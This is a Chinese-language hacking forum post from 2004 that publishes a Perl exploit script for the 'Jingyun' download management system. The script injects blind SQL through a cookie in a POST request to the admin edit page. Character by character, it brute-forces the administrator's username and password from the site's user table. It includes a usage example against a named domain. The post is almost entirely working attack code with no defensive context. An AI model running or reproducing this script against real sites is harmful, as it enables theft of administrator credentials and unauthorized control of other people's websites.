‹‹ 上一主题 | 下一主题 ››
发新话题
打印

惊云下载系统漏洞利用Exploits

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6819 
精华
834 
积分
36070 
阅读权限
255 
性别
男 
来自
中国 
在线时间
586 小时 
注册时间
2004-6-25 
最后登录
2008-9-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-9-11 15:11  只看该作者

惊云下载系统漏洞利用Exploits

文章作者:小路
复制内容到剪贴板
代码:
#!/usr/bin/perl
#The s cript Crack admin for SQL 注入
#Code by xiaolu


use IO::Socket;

$ARGC = @ARGV;
if ($ARGC < 3)
{
print "\n\n";
print "\t* The script write by Xiaolu *\n\n";
print "例子: jy.pl 666w.com /down/admin/edit.asp 80\n";
exit;
}

$host = @ARGV[0];
$way = @ARGV[1];
$port = @ARGV[2];
$errinfo="原密码错误";
print "\n\n开始在 $host 上进行测试,请等待......\n";

for ($userlen=1;$userlen<=20;$userlen++)
{
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(user)%3D$userlen%09and%09&#39;1%3D1";
&url;@res = &connect;
#print "\n @res \n";
if ("@res" =~ /$errinfo/)
{
print "* 发现user长度为: $userlen 位\n";
last;
}
}

for ($pwdlen=1;$pwdlen<=20;$pwdlen++)
{
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(pwd)%3D$pwdlen%09and%09&#39;1%3D1";
&url;@res = &connect;
#print "\n @res \n";
if ("@res" =~ /$errinfo/)
{
print "* 发现pwd长度为: $pwdlen 位\n";
last;
}
}

@dig=(0..9);
@char=(a..z);
@dchar=(A..Z);
@tchar=qw(` ~ ! + @ # $ %25 ^ & * \( \) _ = - { } [ ] :  ; < > ? | , . / \\);
@dic=(@char,@dig,@tchar);
@dic1=(@dig,@char,@tchar,@dchar);

print "\n开始尝试获取user,请等待......\n";
for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
foreach $usertemp(@dic)
{   
$user=$userdic.$usertemp;
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(user,$userlocat)%3D&#39;$user&#39;%09and%09&#39;1%3D1";
#print "$usertemp ";
&url;@res = &connect;
if ("@res" =~ /$errinfo/)
{
$userdic=$user;
if ($userlocat==$userlen){print "\n\n* user获取成功!!! : $user \n";last;}
print "* user共 $userlen 位,前 $userlocat 位为 $user \n";
last;
}
}
}
print "\n开始尝试获取pwd,请等待......\n";
for ($pwdlocat=1;$pwdlocat<=$pwdlen;$pwdlocat++)
{
foreach $pwdtemp(@dic1)
{   
$pwd=$pwddic.$pwdtemp;
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(pwd,$pwdlocat)%3D&#39;$pwd&#39;%09and%09&#39;1%3D1";
#print "$pwdtemp ";
&url;@res = &connect;
if ("@res" =~ /$errinfo/)
{
$pwddic=$pwd;
if ($pwdlocat==$pwdlen){print "\n\n* pwd获取成功!!! : $pwd \n";last;}
print "* pwd共 $pwdlen 位,前 $pwdlocat 位为 $pwd \n";
last;
}
}
}

sub url
{
$req = "POST $way HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: [url]http://$host$way[/url]\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: $host\r\n".
"Content-Length: 164\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie: ASPSESSIONIDCQDSRBCC=PNKEJFPDCHNPPHOCJICEPCHP; JyDownUserDj=3; JyDownUserName=$way1\r\n".
"\r\n".
"type=save&pwd=1&pwd1=&pwd2=&sex=%C4%D0&face=&oicq=&email=&homepage=&qm=%BB%B6%D3%AD%C4%E3%C0%B4%B5%BD%BB%AA%CC%DA%C1%AA%BA%CF.&softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4\r\n\r\n";
}


sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
                      PeerAddr =>$host,
                      PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题